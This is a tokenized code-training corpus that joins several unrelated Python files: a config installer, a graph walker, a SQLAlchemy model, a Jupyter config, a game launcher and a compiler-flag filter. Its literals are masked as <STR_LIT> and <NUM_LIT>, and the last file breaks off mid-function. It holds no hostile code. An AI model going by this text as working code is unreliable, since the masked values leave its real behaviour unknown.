__install_file ( self , config ) : <EOL> source = config . get ( '<STR_LIT:source>' ) <EOL> if source . startswith ( "<STR_LIT:http>" ) : <EOL> if config . has ( '<STR_LIT:username>' ) and config . has ( '<STR_LIT:password>' ) : <EOL> source_content = self . lib . authenticated_get ( config . get ( '<STR_LIT:username>' ) , <EOL> config . get ( '<STR_LIT:password>' ) , <EOL> source ) . decode ( "<STR_LIT:utf-8>" ) <EOL> else : <EOL> source_content = lib . cleaned_request ( '<STR_LIT>' , source ) . text <EOL> else : <EOL> source_content = open ( os . path . expanduser ( source ) ) . read ( ) <EOL> if config . has ( '<STR_LIT>' ) : <EOL> replacements = { } <EOL> for key in config . get ( '<STR_LIT>' ) . split ( '<STR_LIT:U+002C>' ) : <EOL> key = key . strip ( ) <EOL> if config . has ( key ) : <EOL> replacements [ key ] = config . get ( key ) <EOL> try : <EOL> source_content = string . Formatter ( ) . vformat ( <EOL> source_content , ( ) , defaultdict ( str , ** replacements ) ) <EOL> except Exception as e : <EOL> error_message = "<STR_LIT>" . format ( err = e . message ) <EOL> if config . is_affirmative ( '<STR_LIT>' , False ) : <EOL> raise e <EOL> else : <EOL> self . logger . error ( error_message ) <EOL> target_file = os . path . expanduser ( config . get ( '<STR_LIT:target>' ) ) <EOL> parent_directory = os . path . dirname ( target_file ) <EOL> if not os . path . exists ( parent_directory ) : <EOL> os . makedirs ( parent_directory ) <EOL> if os . path . isfile ( target_file ) and config . has ( '<STR_LIT>' ) : <EOL> target_content = open ( target_file ) . read ( ) <EOL> if target_content != source_content : <EOL> backup_target_base = "<STR_LIT>" . format ( path = target_file , ext = config . get ( '<STR_LIT>' ) ) <EOL> backup_target = backup_target_base <EOL> i = <NUM_LIT:1> <EOL> while os . path . isfile ( backup_target ) : <EOL> backup_target = "<STR_LIT>" . format ( path = backup_target_base , i = i ) <EOL> i += <NUM_LIT:1> <EOL> self . logger . info ( "<STR_LIT>" % backup_target ) <EOL> os . rename ( target_file , backup_target ) <EOL> with open ( target_file , '<STR_LIT>' ) as fh : <EOL> fh . write ( source_content ) </s>
<s> import pytest <EOL> from sprinter . next . environment . injections import Injections <EOL> @ pytest . fixture <EOL> def injections ( ) : <EOL> return Injections ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from collections import deque , namedtuple <EOL> from functools import reduce <EOL> import operator <EOL> import sys <EOL> import types <EOL> version_info = ( <NUM_LIT:1> , <NUM_LIT:4> ) <EOL> version = "<STR_LIT:.>" . join ( map ( str , version_info ) ) <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> class ConstSequence ( object ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , seq ) : <EOL> if isinstance ( seq , ConstSequence ) : <EOL> seq = seq . _adaptee <EOL> self . _adaptee = seq <EOL> def __getitem__ ( self , key ) : <EOL> if isinstance ( key , types . SliceType ) : <EOL> return ConstSequence ( self . _adaptee [ key ] ) <EOL> else : <EOL> return self . _adaptee [ key ] <EOL> def __len__ ( self ) : <EOL> return len ( self . _adaptee ) <EOL> def __contains__ ( self , key ) : <EOL> return key in self . _adaptee <EOL> def __iter__ ( self ) : <EOL> return ( x for x in self . _adaptee ) <EOL> def __reversed__ ( self ) : <EOL> return ( x for x in reversed ( self . _adaptee ) ) <EOL> class _Int ( int ) : <EOL> pass <EOL> _cs = _Int ( ) <EOL> for _i , _line in enumerate ( """<STR_LIT>""" . strip ( ) . splitlines ( ) ) : <EOL> _name = _line . lstrip ( ) . split ( "<STR_LIT::>" ) [ <NUM_LIT:0> ] <EOL> setattr ( _cs , _name , <NUM_LIT:1> << _i ) <EOL> _NamedEvent = namedtuple ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def _event_items ( ) : <EOL> yield "<STR_LIT>" , _cs . lnr | _cs . lr <EOL> yield "<STR_LIT>" , _cs . irnc | _cs . ie | _cs . iw | _cs . ix | _cs . ic <EOL> yield "<STR_LIT>" , _cs . ie <EOL> yield "<STR_LIT>" , _cs . iw <EOL> yield "<STR_LIT>" , _cs . ix <EOL> yield "<STR_LIT>" , _cs . lr | _cs . irnc | _cs . ic <EOL> yield "<STR_LIT>" , _cs . ic <EOL> _named_events = tuple ( _NamedEvent ( * pair ) for pair in _event_items ( ) ) <EOL> globals ( ) . update ( dict ( _named_events ) ) <EOL> _event_names = tuple ( e . name for e in _named_events ) <EOL> def _test_events ( ) : <EOL> for i , t in enumerate ( ( <EOL> _cs . lnr == ( leaf & ~ bounce ) , <EOL> _cs . lr == ( leaf & bounce ) , <EOL> <NUM_LIT:0> == ( leaf & inner ) , <EOL> _cs . irnc == ( inner & bounce & ~ cycle ) , <EOL> ( _cs . ie == enter ) and ( _cs . ie == ( inner & enter ) ) , <EOL> ( _cs . iw == within ) and ( within == ( inner & within ) ) , <EOL> ( _cs . ix == exit ) and ( exit == ( inner & exit ) ) , <EOL> ( _cs . ic == cycle ) and ( cycle == ( inner & cycle ) ) , <EOL> ( cycle & bounce ) == cycle , <EOL> ( cycle | bounce ) == bounce , <EOL> ) ) : <EOL> assert t , i <EOL> _enter , _within , _exit , _cycle , _pop = ( <EOL> _Int ( enter ) , _Int ( within ) , _Int ( exit ) , _Int ( cycle ) , _Int ( <NUM_LIT:1> << <NUM_LIT:15> ) ) <EOL> def parse_event_arg ( events ) : <EOL> if isinstance ( events , int ) : <EOL> events = ( events , ) <EOL> events = event ( reduce ( operator . or_ , events ) ) <EOL> selector = [ _pop , None , '<STR_LIT>' , None , '<STR_LIT>' , None ] <EOL> for i , ev in ( ( <NUM_LIT:1> , _exit ) , ( <NUM_LIT:3> , _within ) , ( <NUM_LIT:5> , _enter ) ) : <EOL> if ev & events : <EOL> selector [ i ] = ev <EOL> selector = list ( item for item in selector if item is not None ) <EOL> mask = event ( events ) <EOL> return mask , selector <EOL> def event ( n ) : <EOL> """<STR_LIT>""" <EOL> return n & <NUM_LIT> <EOL> if sys . version_info < ( <NUM_LIT:3> , ) : <EOL> def bytes ( x , ** args ) : <EOL> return x <EOL> def event_repr ( _event_names ) : <EOL> import base64 , re , zlib <EOL> s = """<STR_LIT>""" <EOL> s = str ( zlib . decompress ( base64 . b64decode ( bytes ( s , encoding = "<STR_LIT:ascii>" ) ) ) ) <EOL> s = re . sub ( r"<STR_LIT>" , ( lambda mo : _event_names [ int ( mo . group ( <NUM_LIT:0> ) ) ] ) , s ) <EOL> s = re . sub ( r"<STR_LIT>" , r"<STR_LIT>" , s ) <EOL> s = tuple ( "<STR_LIT>" % x for x in s . split ( "<STR_LIT:;>" ) ) <EOL> def event_repr ( n ) : <EOL> """<STR_LIT>""" <EOL> return s [ n & <NUM_LIT> ] <EOL> return event_repr <EOL> event_repr = event_repr ( _event_names ) <EOL> class _MockDict ( object ) : <EOL> "<STR_LIT>" <EOL> def __getitem__ ( self , key ) : <EOL> pass <EOL> def __setitem__ ( self , key , value ) : <EOL> pass <EOL> def __contains__ ( self , key ) : <EOL> pass <EOL> def walk ( node , gen_subnodes , event = enter , reverse_path = False , tree = True ) : <EOL> """<STR_LIT>""" <EOL> mask , selector = parse_event_arg ( event ) <EOL> isub = selector . index ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> ileft = selector . index ( '<STR_LIT>' , isub + <NUM_LIT:1> ) <EOL> tcycle = mask & cycle <EOL> tleaf = mask & leaf <EOL> tibounce = mask & bounce & inner <EOL> tfbounce = mask & bounce & leaf <EOL> tffirst = mask & ~ bounce & leaf <EOL> todo = deque ( ( iter ( ( node , ) ) , ) ) <EOL> path = deque ( ) <EOL> const_path = ConstSequence ( path ) <EOL> if reverse_path : <EOL> ppush , ppop , ivisited = path . appendleft , path . popleft , <NUM_LIT:0> <EOL> else : <EOL> ppush , ppop , ivisited = path . append , path . pop , - <NUM_LIT:1> <EOL> less , more = todo . pop , todo . extend <EOL> hist = _MockDict ( ) if tree else dict ( ) <EOL> try : <EOL> while True : <EOL> sequence = todo [ - <NUM_LIT:1> ] <EOL> if sequence . __class__ is _Int : <EOL> less ( ) <EOL> if sequence is _pop : <EOL> hist [ path [ ivisited ] ] = tibounce <EOL> ppop ( ) <EOL> else : <EOL> const_path . event = sequence <EOL> yield const_path <EOL> else : <EOL> try : <EOL> node = next ( sequence ) <EOL> except StopIteration : <EOL> less ( ) <EOL> else : <EOL> ppush ( node ) <EOL> if node in hist : <EOL> const_path . event = hist [ node ] <EOL> if const_path . event : <EOL> yield const_path <EOL> ppop ( ) <EOL> else : <EOL> sub = iter ( gen_subnodes ( node ) ) <EOL> try : <EOL> snode = next ( sub ) <EOL> except StopIteration : <EOL> hist [ node ] = tfbounce <EOL> if tleaf : <EOL> const_path . event = tffirst <EOL> yield const_path <EOL> ppop ( ) <EOL> else : <EOL> hist [ node ] = tcycle <EOL> selector [ ileft ] = iter ( ( snode , ) ) <EOL> selector [ isub ] = sub <EOL> more ( selector ) <EOL> except IndexError : <EOL> if todo : <EOL> raise <EOL> for _e in _named_events : <EOL> setattr ( walk , _e . name , _e . value ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> def _graph_example ( n = <NUM_LIT:4> ) : <EOL> from string import ascii_uppercase as labels <EOL> from random import Random <EOL> n = min ( n , <NUM_LIT> ) <EOL> class Node ( object ) : <EOL> def __init__ ( self , letter ) : <EOL> self . letter = str ( letter ) <EOL> self . neigh = list ( ) <EOL> def __str__ ( self ) : <EOL> return self . letter <EOL> __repr__ = __str__ <EOL> nodes = [ Node ( x ) for x in labels [ : n ] ] <EOL> ran = Random ( ) <EOL> ran . seed ( <NUM_LIT> ) <EOL> neighmax = <NUM_LIT:3> <EOL> for n in nodes : <EOL> n . neigh [ : ] = sorted ( ( x for x in ran . sample ( nodes , neighmax ) <EOL> if x is not n ) , key = lambda n : n . letter ) <EOL> for path in walk ( nodes [ <NUM_LIT:0> ] , ( lambda n : n . neigh ) , event ( ~ <NUM_LIT:0> ) , tree = False ) : <EOL> print ( list ( path ) , "<STR_LIT>" . format ( event_repr ( path . event ) ) ) <EOL> def _tree_example ( ) : <EOL> root = ( <EOL> ( ( <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:4> , <NUM_LIT:5> ) , <NUM_LIT:6> ) , <EOL> ( <NUM_LIT:7> , <NUM_LIT:9> ) , <EOL> ) <EOL> def subn ( node ) : <EOL> return node if isinstance ( node , tuple ) else ( ) <EOL> for path in walk ( root , subn , event ( enter | exit | leaf ) ) : <EOL> print ( list ( path ) , "<STR_LIT>" . format ( event_repr ( path . event ) ) ) <EOL> _graph_example ( <NUM_LIT:7> ) <EOL> """<STR_LIT>""" </s>
<s> from sqlalchemy import Column , Integer , String <EOL> from talent_curator . database import Base <EOL> class Candidate ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> first_name = Column ( String ( <NUM_LIT:100> ) ) <EOL> last_name = Column ( String ( <NUM_LIT:100> ) ) <EOL> document_id = Column ( String ( <NUM_LIT> ) ) <EOL> def __init__ ( self , document_id , first_name , last_name = None , * args , ** kwargs ) : <EOL> self . document_id = document_id <EOL> self . first_name = first_name <EOL> self . last_name = last_name <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . id </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from lib import app <EOL> from lib import plugins <EOL> from lib . modules import config as config_loader <EOL> from lib . modules . base_task import BaseTask <EOL> class PollTask ( BaseTask ) : <EOL> def __init__ ( self , config , logger , options ) : <EOL> super ( PollTask , self ) . __init__ ( config , logger , resource = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . plugin_name = options [ '<STR_LIT:name>' ] <EOL> self . plugin = getattr ( plugins , self . plugin_name ) <EOL> def run ( self ) : <EOL> try : <EOL> algo_config = config_loader . load ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) ) <EOL> algo_config = algo_config . get ( self . plugin_name ) [ '<STR_LIT>' ] <EOL> except AttributeError : <EOL> return None <EOL> for service , options in algo_config . iteritems ( ) : <EOL> if service and options : <EOL> params = { '<STR_LIT>' : options , '<STR_LIT>' : service } <EOL> app . task_runner . delay ( self . plugin , params ) <EOL> return True </s>
<s> c . NotebookApp . ip = '<STR_LIT:*>' <EOL> c . NotebookApp . port = <NUM_LIT> <EOL> c . NotebookApp . open_browser = False <EOL> c . MultiKernelManager . default_kernel_name = '<STR_LIT>' </s>
<s> import pyglet . app <EOL> from pycraft . window import Window <EOL> from pycraft . world import World <EOL> from pycraft . objects . player import Player <EOL> from pycraft . configuration import ConfigurationLoader <EOL> WINDOW_CAPTION = '<STR_LIT>' <EOL> def main ( ) : <EOL> config_loader = ConfigurationLoader ( ) <EOL> config_data = config_loader . load_configuration_file ( ) <EOL> config_loader . check_configuration ( ) <EOL> window = Window ( <EOL> ticks_ps = config_data [ "<STR_LIT>" ] [ "<STR_LIT>" ] , <EOL> width = config_data [ "<STR_LIT>" ] [ "<STR_LIT:width>" ] , <EOL> height = config_data [ "<STR_LIT>" ] [ "<STR_LIT>" ] , <EOL> caption = WINDOW_CAPTION , <EOL> resizable = config_data [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> ) <EOL> window . set_exclusive_mouse ( config_data [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> pyglet . app . run ( ) </s>
<s> from __future__ import absolute_import <EOL> from __future__ import print_function <EOL> from subprocess import * <EOL> import collections <EOL> import pprint <EOL> import logging <EOL> import errno <EOL> import os <EOL> import re <EOL> import sys <EOL> import tempfile <EOL> from . popenwrapper import Popen <EOL> fullSelfPath = os . path . realpath ( __file__ ) <EOL> prefix = os . path . dirname ( fullSelfPath ) <EOL> driverDir = prefix <EOL> llvmCompilerPathEnv = '<STR_LIT>' <EOL> elfSectionName = '<STR_LIT>' <EOL> darwinSegmentName = '<STR_LIT>' <EOL> darwinSectionName = '<STR_LIT>' <EOL> _logger = logging . getLogger ( __name__ ) <EOL> DUMPING = False <EOL> class ArgumentListFilter ( object ) : <EOL> def __init__ ( self , inputList , exactMatches = { } , patternMatches = { } ) : <EOL> defaultArgExactMatches = { <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . outputFileCallback ) , <EOL> '<STR_LIT:-c>' : ( <NUM_LIT:0> , ArgumentListFilter . compileOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . preprocessOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . assembleOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . verboseFlagCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . defaultBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . defaultBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . abortUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . dependencyOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . dependencyOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . dependencyBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . dependencyOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . dependencyOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . dependencyBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . dependencyBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . dependencyOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . dependencyOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . defaultBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . defaultBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . defaultBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . defaultBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . linkBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . linkBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . linkBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . linkBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . linkBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . linkBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . linkUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . linkUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . linkUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . linkUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . linkUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . linkUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . linkBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . linkBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . darwinWarningLinkUnaryCallback ) , <EOL> } <EOL> defaultArgPatterns = { <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . inputFileCallback ) , <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . objectFileCallback ) , <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . linkUnaryCallback ) , <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . linkUnaryCallback ) , <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> } <EOL> self . inputList = inputList <EOL> self . inputFiles = [ ] <EOL> self . objectFiles = [ ] <EOL> self . outputFilename = None <EOL> self . compileArgs = [ ] <EOL> self . linkArgs = [ ] <EOL> self . isVerbose = False <EOL> self . isDependencyOnly = False <EOL> self . isPreprocessOnly = False <EOL> self . isAssembleOnly = False <EOL> self . isAssembly = False <EOL> self . isCompileOnly = False <EOL> argExactMatches = dict ( defaultArgExactMatches ) <EOL> argExactMatches . update ( exactMatches ) <EOL> argPatterns = dict ( defaultArgPatterns ) <EOL> argPatterns . update ( patternMatches ) <EOL> self . _inputArgs = collections . deque ( inputList ) <EOL> while ( len ( self . _inputArgs ) > <NUM_LIT:0> and <EOL> not ( self . isAssembly or <EOL> self . isAssembleOnly or <EOL> self . isPreprocessOnly ) ) : <EOL> currentItem = self . _inputArgs . popleft ( ) <EOL> _logger . debug ( '<STR_LIT>' + currentItem ) <EOL> if currentItem in argExactMatches : <EOL> ( arity , handler ) = argExactMatches [ currentItem ] <EOL> flagArgs = self . _shiftArgs ( arity ) <EOL> handler ( self , currentItem , * flagArgs ) <EOL> else : <EOL> matched = False <EOL> for pattern , ( arity , handler ) in argPatterns . items ( ) : <EOL> if re . match ( pattern , currentItem ) : <EOL> flagArgs = self . _shiftArgs ( arity ) <EOL> handler ( self , currentItem , * flagArgs ) <EOL> matched = True <EOL> break <EOL> if not matched : <EOL> _logger . warning ( '<STR_LIT>' . format ( currentItem ) ) <EOL> self . compileUnaryCallback ( currentItem ) <EOL> if DUMPING : <EOL> self . dump ( ) <EOL> def _shiftArgs ( self , nargs ) : <EOL> ret = [ ] <EOL> while nargs > <NUM_LIT:0> : <EOL> a = self . _inputArgs . popleft ( ) <EOL> ret . append ( a ) <EOL> nargs = nargs - <NUM_LIT:1> <EOL> return ret <EOL> def abortUnaryCallback ( self , flag ) : <EOL> _logger . warning ( '<STR_LIT>' . format ( str ( self . inputList ) ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def inputFileCallback ( self , infile ) : <EOL> _logger . debug ( '<STR_LIT>' + infile ) <EOL> self . inputFiles . append ( infile ) <EOL> if re . search ( '<STR_LIT>' , infile ) : <EOL> self . isAssembly = True <EOL> def outputFileCallback ( self , flag , filename ) : <EOL> self . outputFilename = filename <EOL> def objectFileCallback ( self , objfile ) : <EOL> self . objectFiles . append ( objfile ) <EOL> def preprocessOnlyCallback ( self , flag ) : <EOL> self . isPreprocessOnly = True <EOL> def dependencyOnlyCallback ( self , flag ) : <EOL> self . isDependencyOnly = True <EOL> self . compileArgs . append ( flag ) <EOL> def assembleOnlyCallback ( self , flag ) : <EOL> self . isAssembleOnly = True <EOL> def verboseFlagCallback ( self , flag ) : <EOL> self . isVerbose = True <EOL> def compileOnlyCallback ( self , flag ) : <EOL> self . isCompileOnly = True <EOL> def linkUnaryCallback ( self , flag ) : <EOL> self . linkArgs . append ( flag ) <EOL> def compileUnaryCallback ( self , flag ) : <EOL> self . compileArgs . append ( flag ) <EOL> def darwinWarningLinkUnaryCallback ( self , flag ) : <EOL> if sys . platform . startswith ( '<STR_LIT>' ) : <EOL> _logger . warning ( '<STR_LIT>' . format ( flag ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> self . linkArgs . append ( flag ) <EOL> def defaultBinaryCallback ( self , flag , arg ) : <EOL> _logger . warning ( '<STR_LIT>' . format ( flag , arg ) ) <EOL> def dependencyBinaryCallback ( self , flag , arg ) : <EOL> self . isDependencyOnly = True <EOL> self . compileArgs . append ( flag ) <EOL> self . compileArgs . append ( arg ) <EOL> def compileBinaryCallback ( self , flag , arg ) : <EOL> self . compileArgs . append ( flag ) <EOL> self . compileArgs . append ( arg ) <EOL> def linkBinaryCallback ( self , flag , arg ) : <EOL> self . linkArgs . append ( flag ) <EOL> self . linkArgs . append ( arg ) <EOL> def getOutputFilename ( self ) : 